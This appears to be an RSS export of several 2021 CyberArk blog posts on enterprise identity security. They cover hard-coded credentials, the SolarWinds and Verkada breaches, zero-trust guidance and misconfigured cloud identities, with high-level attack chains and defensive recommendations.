Hard-Coded Credentials: The Not-So-Secret Secret Putting Your Cloud at Risk https://www.cyberark.com/blog/hard-coded-credentials-the-not-so-secret-secret-putting-your-cloud-at-risk/ Tue, 06 Apr 2021 13:00:34 +0000 https://www.cyberark.com/?p=116004 Hardcoded Credentials Secrets In Cloud

If you’ve never celebrated the Epiphany (or Mardi Gras in Louisiana), you have likely missed out on the tradition of the King Cake. It’s a coffee cake-type pastry with a small figurine baked inside that represents good fortune to the one who finds it in their slice.

Think of an organization’s most valuable assets as the figurine baked into a modern IT infrastructure. To do their jobs, hundreds or even thousands of remote workers, customers, vendors, devices, and applications have to bite into this “cake” regularly. While they’re (usually) not after the prize for themselves, they’ve opened up holes to the coveted figurine. And unfortunately, the “winner” is often a cyber criminal who has gotten inside the cake and chewed their way to the cake’s center where the prize awaits.

Today, there’s a good chance an attacker has already taken a bite of the cake. So the question is, how do you keep the coveted trophy away from undeserving fortune seekers?

This is the second piece in a three-part series on real-world cloud attacks, illustrating how cyber criminals and malicious insiders often compromise vulnerable cloud identities and manipulate privileged access to reach into cloud infrastructure and services, and inflict costly, damaging attacks. By adopting an attacker’s mindset, organizations can take a more proactive stance and start turning the tables.

Are Your Hard-Coded Credentials Ripe for Hijacking?

The code and scripts developers write often need credentials and secrets, such as SSH keys and API tokens, to access cloud resources and interact with other apps and tools. To save time, developers often embed these secrets into code. In fact, “hard coding” is a risky habit that’s been around as long as developers have. The problem is these hard-coded credentials (also called embedded credentials) are exposed to everyone else with access to the code.

As more and more organizations build and operate applications using cloud-native architecture, the risk of hard-coded credential compromise can increase. That’s because agile development settings typically exchange a lot of code with cloud-based repositories like GitHub. Each exchange can inadvertently expose credentials, including hard-coded credentials, to potential attackers, and sometimes, the entire public. North Carolina State University researchers found that over 100,000 of GitHub’s code repositories contained exposed credentials – and that was after scanning only 13% of the service’s total public repositories.

By taking just one leaked cloud credential from one identity, an attacker can gain entry to an organization’s environment, escalate privileges and potentially gain privileged access to highly sensitive cloud resources.

Step by step, here’s what a real-world cloud attack that hijacks hard-coded or embedded credentials might look like:

Cloud Attack That Hijacks Hard-Coded or Embedded Credentials

1. Gaining a foothold. A routine code exchange with GitHub contains embedded credentials. Using simple, publicly available harvesting tools, an attacker trawls the code for strings that correspond with cloud credential characteristics obtains access keys, and uses them to secure an initial foothold into the organization.

2. Escalating privilege. The attacker uses the stolen credential to escalate privileges, and with heightened access, begins to move freely with full access to a cloud database.

3. Gaining access. The attacker just hit the jackpot! That cloud database contained sensitive data on millions of customers and employees, which are stolen and leveraged for ransom.

4. The result. The organization pays tens of thousands of dollars in ransom to the attacker, as well as a hefty $1 million in regulatory fees.

Have Your Cake and Eat it Too

By removing hard-coded credentials and secrets in code, PaaS configurations, application development tools (such as orchestration platforms), and internally developed applications, following privileged access management best practices, and implementing strongly authenticated secret delivery mechanisms, organizations will be better equipped to keep their cloud secrets, secret.

Review the scenario above and start thinking about how an attacker might be able to exploit vulnerabilities in your environment. Then take action by digging deeper into foundational risk mitigation and secrets management strategies so you can bolster defenses and embrace the cloud with confidence.

Next up, we will examine one of the most highly coveted cloud targets – the cloud console – and why so many organizations don’t even know it’s exposed.

]]>
Applications Are Everything and Everywhere – Does Whack-a-Mole Security Work? https://www.cyberark.com/blog/applications-are-everything-and-everywhere-does-whack-a-mole-security-work/ Fri, 02 Apr 2021 13:00:09 +0000 https://www.cyberark.com/?p=115837 DevOps Cloud Native Application Security

The SolarWinds digital supply chain attack began by compromising the “heart” of the CI/CD pipeline and successfully changing application code. It highlighted the major challenges organizations face in securing their applications across the software development lifecycle and is driving increased attention at the highest levels of enterprise and government. In fact, Reuters recently reported that the Biden administration is preparing an executive order outlining new software security and breach disclosure requirements.

As organizations look to strengthen their digital supply chain and protect the applications they develop and use, many are focusing on application secrets – which are ripe targets for attackers and can provide unrestricted privileged access to sensitive systems.

Cloud-Native Apps Expand Security Needs

Today, many organizations are taking a cloud-native approach to building, testing, and deploying new applications – whether front- or back-office, consumer-facing, web or mobile. And by embracing DevOps methodologies and automation, they’re quickly moving along the digital maturity curve.

As applications are increasingly built using microservices and run in dynamic, short-lived containerized environments, everything needs to interact with each other – sharing secrets and credentials to securely access resources. The result: a lot more secrets that need to be secured.

What’s more, the powerful DevOps and automation tools developers use such as Jenkins and Ansible to build applications store massive amounts of credentials and secrets within them. This allows the projects, playbooks, and scripts managed by these mission-critical “Tier 0” assets to access other tools, services, and platforms. All of these tools also require high levels of privilege.

Whack-a-Mole Security: So Many Applications, So Little Time, No Standard Approach

But, of course, it’s more than just cloud-native apps. Most enterprises have many different application types in their portfolio: some legacy apps, newer apps written using .NET, for example, and even mainframe applications.

It’s becoming clear that building a strong modern IT infrastructure hinges on an organization’s ability to secure all application types – from the back-office mainframe running high volume transactions on zOS, to Kubernetes apps running across multiple cloud regions – at the speed of business, and at scale.

Yet that’s easier said than done. Today’s developer culture emphasizes high velocity, intensive sharing of code, ad-hoc tooling, and full-on automation – all of which can introduce new vulnerabilities such as exposed secrets and code injection. Meanwhile, threat actors are growing in sophistication and precision, targeting applications and development environments and zeroing in on unprotected credentials and secrets with increasing ease to hijack IT resources or steal data or code. Even the most secure RPA workflows and DevOps pipelines have tiny cracks if you know how to find them.

So how can time- and resource-constrained security teams possibly find and secure all of these applications and secrets – let alone protect new ones being created each day in these dynamic environments?

Many end up taking a piecemeal approach, securing secrets in one platform or tool with one secrets management solution, while using a different method to secure secrets in another area. Without a standardized approach to secrets management, teams are left juggling many different moving pieces. The old game of whack-a-mole comes to mind: as soon as one issue is resolved, another one pops up.

Secure All Application Types with CyberArk

At CyberArk, we’ve long been committed to helping organizations secure the broadest range of applications across the broadest range of environments with our privileged access management (PAM) solutions. As our customers move along the digital maturation curve, many are shifting to our PAM-as-a-service offering, CyberArk Privilege Cloud.

In Q1 2021, we introduced a new integration between CyberArk Privilege Cloud and CyberArk Conjur Secrets Manager Enterprise, providing our SaaS customers with a centralized way to secure cloud-native, containerized apps and DevOps environments. This follows our integration with CyberArk Credential Providers, further expanding support across many application types.

Now organizations can centrally secure, manage and audit privileged credentials and secrets used by non-human identities anywhere – including cloud-native applications, CI/CD and DevOps tools, internally developed applications, commercial-off-the-shelf (COTs) apps, RPA software bots and automation platforms – whether they’re running PAM as-a-service or on premises.

With CyberArk, mission-critical applications running at scale can securely access high-value resources, including databases and IT infrastructure. Our flexible SaaS model makes deployment faster and easier, reduces operational complexity, and drives business agility – all while shrinking the attack surface.

The Right Place to Start

Putting a plan in place to secure the ever-expanding number and types of applications across your organization can feel daunting – but it doesn’t have to. Take advantage of tools that help you prioritize and focus on your most important unsecured apps first, achieve “quick wins” in reducing risk, and accelerate your efforts by being more strategic.

Stop playing whack-a-mole. Get consistent about secrets management to keep your applications safe and prevent them from exposing the enterprise to unnecessary vulnerabilities. Get a personalized demo to learn more.

]]>
Revelations About Securing Hybrid Cloud Environments Post-SolarWinds https://www.cyberark.com/blog/revelations-about-securing-hybrid-cloud-environments-post-solarwinds/ Wed, 31 Mar 2021 13:00:37 +0000 https://www.cyberark.com/?p=115655 Hybrid Cloud Cybersecurity SolarWinds

In the early 1960s, J.C.R. Licklider, director of the Pentagon’s Information Processing Techniques Office (IPTO), spoke of a future “intergalactic computer network” that would serve as the “main and essential medium of informational interaction for governments, institutions, corporations, and individuals.”

Today, Licklider’s vision is very much reality. Cloud services and technologies are ubiquitous, enabling organizations of all sizes and across all sectors to connect, collaborate and push the boundaries of innovation. Yet those who wish to do harm are also making strides. Malicious actors understand four things:

  • That cloud misconfigurations are rampant.
  • Even “ordinary” user identities in the cloud can be configured with as much power as traditional privileged admin accounts.
  • They can use familiar methods from on-premises attacks (like privilege escalation and lateral movement) while covering more ground in less time by taking the cloud route.
  • When a cloud identity is overpermissioned (which happens all the time), they can often use it to move around without detection.

The Digital Supply Chain Attack That Reached Into the Cloud and Around the World

The massive SolarWinds breach illustrates this increased focus on the cloud — particularly the privilege escalation stage of a multi-step digital supply chain attackafter the attacker had successfully infiltrated a SolarWinds Orion customer. Here’s a look:

Orion software requires privileged access to run, whether it is installed on physical servers on-premises or on virtual machines in the cloud. When the SUNBURST malware reached a victim organization via software update, it reportedly already had elevated privileged access, making it easier for the attacker to establish a foothold in the Orion software. And by doing so,  the attacker may have been able to extract privileged API keys, allowing them to “own” the organization’s cloud right away.

In some instances, the attacker used the sophisticated “Golden SAML” attack technique, leveraging their privileged access to target the popular SAML authentication standard, which is used to establish trust between on-premises and cloud environments. The adversary gained admin access to the victim’s Active Directory Federation Services (ADFS) server, stole the primary secret of this identity provider, and then used it to forge SAML tokens and bypass MFA completely. With unfettered privileged access to nearly any of an organization’s systems and applications, the attacker could impersonate virtually any identity and move laterally between cloud and on-premises systems with ease.

Apples-to-Oranges: The Hybrid Cloud Security Conundrum

Nearly every organization uses cloud services, and 80% have taken a hybrid cloud approach — keeping some infrastructure on-premises and moving other functions and services to the cloud, according to a 2021 Flexera survey. These workloads are often spread across multiple public cloud platforms for myriad reasons: business flexibility, specific business line needs, prior acquisitions, geographic coverage and more. In fact, a recent Cloud Security Alliance study found 81% of organizations have a multi-cloud strategy in place, while the same Flexera report estimates organizations use or experiment with an average of 3.7 public cloud providers.

Securing the operations of hybrid cloud environments is uniquely challenging. These diversified, yet highly interconnected environments introduce new types of threats and expanded attack surfaces that make security teams’ jobs a lot more difficult. Since traditional security approaches don’t always translate in cloud environments, there’s a lot of new information and technology to learn but rarely enough time or resources. Add in the complexity of DevOps tools, automation, countless SaaS apps and shadow IT, and it’s easy to see why security teams are overwhelmed.

As more organizations “assume breach” and focus on ways to proactively identify and respond to in-progress attacks, security teams are looking for more consistent ways to secure high-value data and assets, no matter where they reside. The most effective follow these best practices:

1. Get a Full View of Identity. Since nearly every targeted cyberattack today involves the compromise of identity and abuse of privileged credentials, most teams begin by taking inventory of their privileged and identity landscape. They then establish a single, centralized way to visualize and manage credentials such as passwords, access keys and API keys across their hybrid cloud environment.

2. Follow Security Best Practices Outlined by Your Federated Identity Provider. In the case of SolarWinds, attackers abused trust in federated authentication environments to access critical assets and data. It is crucial to revisit and follow the security best practices outlined by your federated identity provider to reduce risk of abuse in these powerful mechanisms. For example, Microsoft offers a comprehensive guide for secure planning and deployment of Active Directory Federation Services and Web Application Proxy. For additional guidance on Golden SAML detection and mitigation activities, read this piece by CyberArk Labs and the NSA advisory.

3. Reevaluate “High-Value” Assets. When securing access to high-value, high-risk assets, such as Active Directory and domain controllers, cloud management consoles and portals sometimes get overlooked. But if compromised, an attacker can gain full control of an organization’s cloud services and resources. Root-level user accounts (or “break glass accounts”) should be vaulted and rotated as any other privileged credentials. Federate access to these consoles, along with virtual machines and CLIs, and authenticate with your preferred identity provider.

Enforcing strong PAM controls, such as securing and rotating AWS root accounts protected with MFA, will help to reduce exposure, while continuously managing privileged sessions can help security teams spot potential issues earlier and make it harder for attackers to maintain persistence. After the highest value targets are secured, teams can expand coverage to other areas.

4. Be Consistent About Least Privilege and Enforce it Everywhere. Many security-minded organizations are shifting to Zero Trust security frameworks that employ the principle of least privilege to block privilege escalation and lateral movement. Many are using frameworks such as the MITRE ATT&CK and Cloud Security Alliance’s Cloud Control Matrix to guide them. Least privilege approaches limit the number of users with admin privileges and replace standing access with just-in-time privileged access. In cloud environments, this also entails conducting regular entitlement reviews to identify unused or misconfigured IAM permissions that pose heightened risk. AI-powered solutions and integrations can help automate identification and remediation of excessive cloud permissions.

5. Secure Human Access with Adaptive MFA and SSO. Identity as a Service (IDaaS) capabilities that can strongly authenticate human identities are integral to a defense-in-depth security approach — no matter the environment. To minimize end-user friction, consider solutions that integrate with major cloud providers’ native capabilities — AWS Single Sign-On, for example — to enable automatic provisioning of users/groups and simplify access to authorized accounts and resources. It’s critically important to layer IDaaS protections with strong PAM controls to reduce the risk of stealthy bypass techniques like Golden SAML.

Consistency to Reduce Dangerous Cloud Security Cracks 

Once a far-off “intergalactic computer network” dream, the cloud now powers our world and repositions the security perimeter around individual identities.

The SolarWinds attack reminds us that attackers are innovating in lockstep with defenders and turning to the cloud as a force multiplier. Staying ahead will require organizations to adopt an attacker mindset and find ways to make cyber criminals’ jobs as difficult as possible. This means limiting their movements and spotting signs of attack before compromised identities can become privileged and open paths to sensitive assets. A consistent approach to Identity Security rooted in privileged access management can help organizations maintain the visibility and control they need to defend their organizations.

]]>
New CISO View Insights on Zero Trust https://www.cyberark.com/blog/new-ciso-view-insights-on-zero-trust/ Thu, 25 Mar 2021 13:00:34 +0000 https://www.cyberark.com/?p=115408 CISO View Survey and Report

Credential theft is on the rise, yet attackers are shifting their collective focus to non-traditional user populations that may not be adequately protected. That’s according to the “The CISO View 2021 Survey: Zero Trust and Privileged Access,” released today by CyberArk.

Here’s a look at some of the key findings:

CISO View on Zero Trust

As organizations move assets to the cloud, increase third-party access to corporate resources and enable sustained remote work models, new identities are multiplying across the enterprise. Any identity – whether customer, remote worker, third-party vendor, device or application – can become privileged at any moment, depending on what they’re accessing or doing.

This new survey demonstrates consensus around the value of Zero Trust – an approach that “never trusts and always verifies.” And in the wake of the massive SolarWinds attack, it highlights a growing sense of urgency for protecting privileged credentials and breaking the attack chain to organizations’ most valuable assets.

The survey is a companion to “The CISO View: Protecting Privileged Access in a Zero Trust Model,” which is based on in-depth interviews with a panel of 12 top security executives from Global 1000 companies.

Read the survey and report, and watch an overview video here.

]]>
CISA and NSA: The Times, They Are A-Changin.’ Identity is Everything Now https://www.cyberark.com/blog/cisa-and-nsa-the-times-they-are-a-changin-identity-is-everything-now/ Tue, 23 Mar 2021 13:00:28 +0000 https://www.cyberark.com/?p=114969 Identity Security Zero Trust Guidance

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack, which acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA) Brandon Wales called “the most complex and challenging hacking incident the agency has come up against.” As impacted agencies and private enterprises work to pick up the pieces, there’s debate over the best ways to tackle systemic weaknesses and improve cyber intelligence sharing across the board. But one thing everyone can agree on is that traditional security approaches – which have failed to change with the digital times – are in dire need of an overhaul.

CISA: “Identity Has Become the Boundary”

The SolarWinds breach, along with nearly every major cyber attack today, involved the compromise of identity and subsequent manipulation of privileged access. While presenting forensic analysis of the attack at NIST’s most recent Information Security and Privacy Advisory Board meeting, CISA technical strategist Jay Gazlay put it bluntly: “Identity is everything now.”

While Gazlay acknowledged that very few could pull off such a highly sophisticated digital supply chain attack without being detected, his message was clear: traditional, perimeter-centric security won’t cut it. “We can talk about our network defenses. We can talk about the importance of firewalls and network segmentation. But really, identity has become the boundary, and we need to start readdressing our infrastructures in that matter,” he said, according to Federal News Network’s report on the briefing.

Of course, SolarWinds is far from the first major attack to prompt action. But Gazlay warned that attackers are constantly innovating and that protections many agencies put in place after the 2015 Office of Personnel Management breach are likely inadequate today since so many resources have shifted to the cloud.

“They’re going after the identities that give them access to all the data holdings – much broader campaigns,” he said, according to Federal News Network. “That makes trust store and identity management compromises much more impactful, and frankly, a much higher target. As we move into a cloud infrastructure where all that matters is the expectation that you are who you say you are, to get access to cloud infrastructures, this becomes even more pernicious.”

NSA: You Better Start Swimmin’ Toward Zero Trust, Or Sink Like a Stone

This focus on identity is accelerating the shift toward Zero Trust, a “never trust, always verify” approach that includes authenticating and authorizing every identity – human or non-human – before granting access. While the concept isn’t new, it’s safe to say Zero Trust is going mainstream as hybrid and multi-cloud environments become the norm.

The U.S. National Security Agency (NSA) recently released guidance for embracing a Zero Trust approach, noting these “principles can better position [cybersecurity professionals] to secure sensitive data, systems, and services.”

As we focus on helping agencies and enterprises secure identities throughout the cycle of accessing critical assets, these recommendations resonated strongly with our CyberArk team. Here’s a look at our top takeaways from the NSA’s Zero Trust directive:

Outsider, Insider – It Doesn’t Matter. Always Assume Breach

NSA authors write, “Contemporary threat actors, from cyber criminals to nation-state actors, have become more persistent, more stealthy, and more subtle; thus, they demonstrate an ability to penetrate network perimeter defenses with regularity.” They urge agencies and organizations to “consciously operate and defend resources with the assumption that an adversary already has presence within the environment.”

In the public sector, we’ve seen the great lengths to which legitimate, authorized users will go to exfiltrate information and accomplish ill-intentioned objectives. An assume breach mindset does not discriminate between outsiders or insiders – instead, every identity and access request is presumed malicious until proven otherwise. And the question shifts from “Have I been breached?” to “Do I have the right alarm systems and motion-sensing lights in place to detect and respond before it’s too late?”

Least Privilege Is Foundational to Zero Trust

Motives vary. Adversaries might try to establish persistence in the environment and hide their activity; the SolarWinds attacker used the sophisticated Golden SAML technique to do this successfully. Or, attackers might aim straight for the domain controller or cloud console in search of sensitive data to steal or hold for ransom, or to cause disruption by shutting down critical systems or deleting files. No matter what they’re after, attackers usually follow the same steps: acquire credentials for an identity, move laterally and vertically to escalate privileges, then use this privileged access to compromise sensitive data and assets.

The most effective way to break this chain and shrink the overall attack surface is to enforce least privilege security controls across all identities, devices, and apps – from the endpoint to the cloud. NSA authors write that “data-centric Zero Trust models allow the concept of least privileged access to be applied for every access decision, where the answers to the questions of who, what, when, where, and how are critical for appropriately allowing or denying access to resources.”

When It Comes to Zero Trust, 1+1=3

There’s no cybersecurity silver bullet, and likewise, Zero Trust cannot be achieved with one vendor or solution – it’s not about a specific technology, it’s an approach and a mindset. Instead, it requires a holistic, layered approach that “integrates disparate but related cybersecurity capabilities into a cohesive engine for cybersecurity decision-making,” write NSA authors.

By placing Privileged Access Management at the core of this defense-in-depth strategy, not only can defenders protect against the leading cause of breaches, they can also minimize the attack’s impact. Consider this scenario: an attacker successfully compromises an agency’s vulnerability management platform, runs an authentication scan and pinpoints every vulnerable and misconfigured identity within the hybrid cloud environment – essentially scoring a step-by-step playbook for the attack. By protecting these powerful tools with Privileged Access Management controls, such as vaulting and rotating privileged credentials and monitoring sessions to detect risky activity, agencies can dramatically limit exposure and keep that playbook out of reach.

It’s Okay to Start Small. But the Time to Start Is Now.

Conceptually, Zero Trust makes perfect sense. But NSA authors warn that putting it into practice will take time. Instead, they encourage a phased, risk-based approach. “Incorporating Zero Trust functionality incrementally as part of a strategic plan can reduce risk accordingly at each step, they write.” Among the NSA’s key Zero Trust design recommendations is to architect from the inside out, first protecting critical data and assets, such as Tier 0 systems, then securing all paths to access them.

The Identity Defined Security Alliance framework can help with scoping and tiering the various technology components that will require protection at the identity level.

The Battle Outside Ragin’ Will Soon Shake Your Windows… For the Times They Are A-Changin’

In SolarWinds’ shadow, many agencies are feeling pressure to address their greatest identity-related vulnerabilities quickly. This NSA directive offers valuable prioritization guidance for achieving “quick wins” to drive down risk, while laying the groundwork for a phased Zero Trust implementation strategy.

In the famous words of Bob Dylan, “The times, they are a-changin.’” Drive resilience in this new threat landscape by embracing a Zero Trust model. And trust CyberArk to help along the way. As the recognized leader in protecting privileged access with multiple Department of Defense customers and 130+ installations across the U.S. federal government, we’re uniquely positioned to help agencies meet today’s modern security and compliance requirements.

 

]]>
Different IoT Breach, Same (In)Security Story, Broader Consequences https://www.cyberark.com/blog/different-iot-breach-same-insecurity-story-broader-consequences/ Fri, 19 Mar 2021 14:09:48 +0000 https://www.cyberark.com/?p=114823 Verkada IoT Security Breach

“I always feel like somebody’s watching me… Tell me is it just a dream?”

It may have been a dream in 1984 when “Somebody’s Watching Me” topped the charts, but today it’s real life: somebody is almost always watching. Security cameras live on street corners and traffic lights, in prisons, schools, hospitals, and gyms, around our homes, and in our workplaces. Like it or not, video surveillance is a huge part of how society protects its people and assets in 2021.

Many of these cameras are cloud-based and connected to company IT networks and infrastructure – sometimes even the same systems that store data and run applications. These cameras, together with billions of other “smart” devices that can connect with and “talk” to each other, make up the Internet of Things (IoT).

But what happens when these interconnected devices are not secured like other sensitive network assets? Last week, the world got a glimpse of when attackers successfully breached video security startup Verkada. According to reports, the attackers gained access to live feeds of about 150,000 IoT-enabled surveillance cameras – positioned over hospital ICU beds, within correctional facilities, in classrooms, and more – and exposed sensitive footage belonging to a number of the software company’s customers.

Attackers Scale Impact by Following a Familiar Path

In this latest IoT breach, it seems the attackers followed a familiar path – one we’ve seen far too often. They reportedly targeted credentials, locating a user name and password for a Verkada admin account exposed on the internet. With this, they were able to move freely throughout the network as if they were a support team member performing bulk maintenance operations on cameras. It was later confirmed more than 100 people within the organization had “super admin” access to this powerful account, each of whom could access thousands of customer cameras.

In a public statement, the company wrote, “In gaining access to the server, the attackers obtained credentials that allowed them to bypass our authorization system, including two-factor authentication.”

Additionally, by gaining root access to the cameras, the attackers could potentially use them to execute their own malicious code, reported Bloomberg. And in some cases, this privileged access could allow them to “to pivot and obtain access to the broader corporate network of Verkada’s customers, or hijack the cameras and use them as a platform to launch future hacks.”

The Great IoT Security Debate

There is much discussion on how to tackle the IoT security challenge, with responsibility at the crux of the debate. Is it the manufacturer that must design and build secure devices from the start? Or is it the customer’s responsibility to strengthen protections – from individuals changing default passwords on devices in their homes to enterprises removing hard-coded passwords and beefing up endpoint security for network-connected IoT devices? There’s an industry-wide push for more standards and guidelines to help clarify these big questions, and most agree there’s much work to be done before we have a clear path forward.

The good news is consensus is growing that IoT devices – especially those used by enterprises and government agencies – must be treated with the same attention and gravity as traditional IT systems. The bipartisan IoT Cybersecurity Improvement Act marked a major milestone in this push. But attackers aren’t waiting around. On the contrary, they’re growing in confidence and precision and increasingly targeting the digital supply chain to scale their impact, demonstrated in both recent Verkada and SolarWinds breaches.

IoT represents a potentially massive attack surface, and no matter how strong an organization’s in-house security practices may be, attackers can sometimes circumvent them. For example, IoT devices often receive wireless firmware updates, and this can present an easy target for compromise.

It’s Time to Get Smart About Smart Devices

Smart IoT devices simultaneously represent some of the greatest innovations and the greatest challenges for the modern workplace. Here are a few ways your digital business can get smarter (and more secure) while using them:

  1. Catalog connected devices in your network. Identify every device on the network (including “BYO” devices) and understand what it does. This includes cameras, printers, doorbells, audio-visual equipment, HVAC systems, or anything else that connects to the internet and/or calls itself “smart.”
  2. Manage devices centrally. IoT devices are often manufactured with built-in or hardcoded passwords – making them easy targets. Replace these with strong, unique passwords, and automate credential storage, rotation, and management to minimize the risk of human error.
  3. Disable automatic root access. This is typically built into IoT devices such as security cameras. Yes, that level of access will be needed on occasion, but even trusted users should have to jump through a few hoops to validate their identity and access path to get it. Which brings us to number four…
  4. Implement the concept of “least privilege.” Limiting what people and devices have access to in a network is one of the best ways to reduce your attack surface and keep attackers from causing harm. Before granting access, always verify the identity, validate the device, then limit access to just what is needed – and remove it when it’s not.
  5. Secure remote access. To counteract the inherent weaknesses of IoT, limit remote access (for firmware updates, maintenance, and more) to verified parties, locations, and established ports.

Who Watches the Watchmen?

The Verkada breach showed us the dark and very dangerous side of the IoT. In its aftermath, new questions are swirling on how surveillance technology should (and should not) be used, how sensitive data should be stored and how access to this data should be managed. Beyond emphasizing current IoT risks, this attack has the potential for far-reaching privacy and regulatory implications, including HIPAA.

While connected cameras are making headlines today, the reality is that any device, endpoint, server, or system that connects to the internet, in any fashion, represents a potential vulnerability. In most enterprises today, more than 30% of all network-connected endpoints are IoT devices – and that’s not even counting mobile devices. Don’t wait for consensus on standards or push it down the priority list: the time to address IoT security in your organization is now.

]]>
Four Trends Shaping the Future of Access Management https://www.cyberark.com/blog/four-trends-shaping-the-future-of-access-management/ Tue, 16 Mar 2021 13:00:33 +0000 https://www.cyberark.com/?p=114320 Access Management Is Evolving

From a remote employee using a personal device for work, to a marketing consultant logging into a shared social media account, to a customer authenticating to use a SaaS app, someone is accessing your organization’s sensitive assets – without ever crossing the traditional network boundary – at any given moment.

That’s why Access Management tools that map access between individual identities and protected resources and provide real-time access control for those connections are critical to enforcing strong enterprise cybersecurity policies. However, as the scope of resources to which users need access is evolving and new drivers influence business strategies, Access Management solutions are growing in capability, increasingly overlapping and converging with adjacent security areas.

So, what matters most when evaluating an Access Management tool today? If you poll stakeholders across your organization you’ll probably get a variety of different answers, since most Access Management initiatives are championed by individual function owners with specific goals and tactical or short-term needs. However, despite differing opinions, most of the related investment drivers fall into four major categories:

  • Defending against attacks
  • Driving operational efficiencies
  • Enabling the digital business
  • Satisfying audit and compliance

Take the rapid shift to remote work, for example. IT security teams were pressured to enable secure remote access for employees to defend against rising cyber attacks tied to COVID-19. This requirement caused disproportionate investments in Access Management solutions that protected the remote workforce but likely limited the broader use of these solutions for other use cases. Most importantly, bolting on ad-hoc solutions reactively has resulted in a heap of disparate Access Management tools that only address specific needs and create potential security gaps across an organization’s digital identity landscape.

Four Trends Shaping the Access Management Space

1. The tactical expansion of Access Management tools has led to a serious security consistency challenge and subsequent push toward unified access platforms to consolidate controls. Most of these tools already include multi-factor authentication (MFA), identity lifecycle management and basic access governance capabilities, such as access requests with approval workflows and directory synchronizations. But the most effective platforms extend their reach with a privilege-centric approach to securing identities – embedding strong Privileged Access Management controls, such as verification and authentication of users for privileged account access via single sign-on (SSO) and multi-factor authentication (MFA) from AM tools, session isolation, and control of endpoint privileges. This convergence of Privileged Access Management and Access Management adds a multitude of risk mitigation benefits and creates new sources for contextual adaptive access controls.

2. Which brings us to the second trend – AI-powered identity management and adaptive authentication. Enterprise access requirements have radically evolved. Meanwhile, authentication processes have not kept pace, as evidenced by pervasive password-based controls. More than 60% of businesses experience a security breach each year and roughly 40% of these occur due to a compromised user password.[1] Traditional, high-friction password processes are frequently ineffective because they rely on end-users remembering constantly changing, complex passwords. And when users are faced with strong authentication methods, they often skirt security processes to perform job tasks more expediently.

Adaptive Access Management, powered by AI, presents a compelling alternative. These solutions can operate without human intervention, gathering and analyzing intelligence on user behavior to visualize and contextualize risk, uncover threat patterns and dynamically adapt authentication processes and access controls. For example, organizations can create policies that prevent high-risk users from launching applications with customer data without validating their identity with high-assurance MFA factors such as physical tokens or fingerprint readers. Meanwhile, low-risk users accessing low-risk applications can skip secondary authentication and keep moving fast. This approach reduces the friction and complexity often associated with “always-on” MFA controls.

3. Expectations for great digital experiences are at an all-time high. Advancements in Customer Identity and Access Management (CIAM) are helping organizations meet these demands by delivering easier, more secure customer access to their websites and apps.

Traditionally, customer authentication has been a point-in-time decision based on the initial credentials the user presented. This could potentially lead to unauthorized access if the customer’s device or credentials were compromised. Modern CIAM solutions leverage user behavior analytics (similar to those described above), such as measuring navigational activity against an established baseline, to authenticate customer identities accurately. And advanced CIAM features such as profile management, customer consent management, and master data management enable support across the entire digital customer journey.

4. The race to the cloud is driving demand for scalable “as-a-service” security solutions – and Access Management is no exception. Organizations are embracing SaaS-delivered Access Management to ease deployment and use, provide more robust, end-to-end security, and realize a host of operational benefits. Even organizations with extensive hybrid environments and many legacy or non-standards-based applications are making the shift thanks to services like app gateways that secure remote access to on-premises apps and give users one-click SSO access to all the apps they need.

As IT environments evolve, cyber criminals increasingly target identities and more organizations adopt a Zero Trust mindset, security, risk, and identity leaders must consider these four trends in totality as they evaluate new Access Management tools and approaches. Watch our on-demand webinar to explore them in-depth.

[1]  Contextual Awareness: Advancing Identity and Access Management to the Next Level of Security Effectiveness, March 2020.

 

 

]]>
Attacker Productivity: Exploit Misconfigured Identities in the Cloud https://www.cyberark.com/blog/attacker-productivity-exploit-misconfigured-identities-in-the-cloud/ Fri, 12 Mar 2021 13:30:00 +0000 https://www.cyberark.com/?p=114173 Misconfigured Cloud Identities

“My goal is no longer to get more done, but rather to have less to do,” writes author Francine Jay. It’s a sentiment that resonates with many of us juggling work, life, and everything in between. There’s no shortage of self-help books and time management tools out there promising to help you master the art of productivity. Unfortunately, attackers have also embraced this notion and their search for ways to work smarter, not harder, has led them straight to the cloud because:

  • (Nearly) everyone is there. A vast majority of enterprises are currently engaged with one or more cloud service providers, and many are running mission-critical applications or storing sensitive data there.
  • There are so many ways to access valuable data. Cloud computing requires the creation and use of numerous Identity and Access Management (IAM) permissions and entitlements to access cloud infrastructure and services. Each of these identities can become privileged under certain conditions, opening a path to an organization’s most valuable data and assets.
  • There are fewer steps to take. Attacks against on-premises infrastructure and applications typically take multiple steps: compromise an initial system, escalate privileges and move laterally to compromise another, then another, then another, until the attacker “owns” a domain. But in the cloud, attackers can fast-track their efforts. By compromising one user’s privileged credentials or API keys, they’re well on their way to achieving their goal in fewer steps, taking less time and with significantly less effort.
  • There’s a gap between cloud adoption and security. IT security teams have been forced to learn and protect brand-new environments quickly and in parallel. Their familiar ways of working and traditional network perimeter security approaches simply don’t work in modern cloud environments. Lacking technical cloud security knowledge and cloud-centric tools – while often being tasked with securing multiple cloud environments at once – they’re struggling to defend their organizations. And attackers know they have an advantage.

This is the first in a three-part series on real-world cloud attacks, illustrating how cyber criminals and malicious insiders are scaling their efforts and getting more done by exploiting vulnerabilities in the cloud. Use these deconstructions to start thinking like an attacker and mapping out your own proactive security strategies.

Are You a Cloud Misconfiguration Away from a Data Breach?

The dynamic nature of the cloud often leads to the misconfiguration of permissions and entitlements associated with identities or users. In fact, the Ponemon Institute 2020 Cost of a Data Breach Report identifies cloud identity misconfigurations as “attackers’ entry point of choice.” Combined with stolen or compromised credentials, cloud identity misconfigurations represent nearly 40% of malicious incidents today.

When you consider that each of the major cloud platforms has more than 5,000 possible permissions and actions that can be assigned, it’s easy to see how misconfigurations happen – and add up fast. Given the scale of deployments, speed of change, and limited visibility from cloud-native tools, a common challenge is the accumulation of unnecessary or unused permissions, which is often not visible to overburdened security teams.

Here is a brief deconstruction of a real-world cloud attack chain that utilized misconfigured cloud identities to fast-track attacker efforts and breach a victim organization’s environment:

Misconfigured Cloud Identities in a Cloud Chain Attack

Step 1. Establish an initial foothold: A misconfigured firewall provides the attacker entry into the company’s cloud provider network and allows privileged access to a virtual server. The attacker exploits a common cloud vulnerability in the webserver that runs on the virtual server and compromises access keys.

Step 2. Escalate privileges: The attacker assumes an over-permissioned role and obtains temporary security credentials to the company’s cloud provider storage bucket.

Step 3. Gain access: The attacker accesses sensitive customer information, including individuals’ social security numbers and personal data, in the storage bucket.

